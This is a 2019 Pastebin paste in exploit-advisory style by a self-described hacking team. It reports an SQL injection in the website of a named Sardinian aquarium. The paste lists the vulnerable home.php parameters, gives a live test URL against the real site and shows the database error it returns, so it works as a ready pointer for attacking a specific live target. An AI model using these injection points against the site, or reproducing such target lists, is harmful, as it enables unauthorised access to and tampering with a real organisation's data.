Advertisement
KingSkrupellos

Acquario di Cala Gonone L'Acquario della Sardegna SQL Inj

Aug 22nd, 2019
97
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.73 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Acquario di Cala Gonone L'Acquario della Sardegna Italia SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 23/08/2019
  7. # Vendor Homepage : acquariocalagonone.it
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ###################################################################
  18.  
  19. # Impact :
  20. ***********
  21. Acquario di Cala Gonone L'Acquario della Sardegna is prone to an SQL-injection vulnerability because
  22. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  23. Exploiting this issue could allow an attacker to compromise the application, access or
  24. modify data, or exploit latent vulnerabilities in the underlying database.
  25. A remote attacker can send a specially crafted request to the vulnerable application and
  26. execute arbitrary SQL commands in application`s database. Further exploitation of this
  27. vulnerability may result in unauthorized data manipulation.
  28. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  29.  
  30. ###################################################################
  31.  
  32. # SQL Injection Exploit :
  33. **********************
  34. /home.php?pageNum_pp=[ID-NUMBER]&inc=news&pl=[SQL Injection]
  35.  
  36. /home.php?pl=[ID-NUMBER]&sl=[ID-NUMBER]&tl=[ID-NUMBER]&lang=eng&inc=contenuti&id=[SQL Injection]
  37.  
  38. /home.php?primo_livello=1&secondo_livello=1&terzo_livello=1&lang=eng&inc=contenuti&paese=1&id=[SQL Injection]
  39.  
  40. /home.php?primo_livello=[ID-NUMBER]&secondo_livello=[ID-NUMBER]&terzo_livello=[ID-NUMBER]&lang=eng&inc=contenuti&paese=[ID-NUMBER]&id=[SQL Injection]
  41.  
  42. ###################################################################
  43.  
  44. # Example Vulnerable Sites :
  45. *************************
  46. [+] acquariocalagonone.it/home.php?primo_livello=1&secondo_livello=1&terzo_livello=1&lang=eng&inc=contenuti&paese=1&id=1%27
  47.  
  48. ###################################################################
  49.  
  50. # Example SQL Database Error :
  51. ****************************
  52. You have an error in your SQL syntax; check the manual that corresponds
  53. to your MariaDB server version for the right syntax to use near '' at line 1
  54.  
  55. ###################################################################
  56.  
  57. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  58.  
  59. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement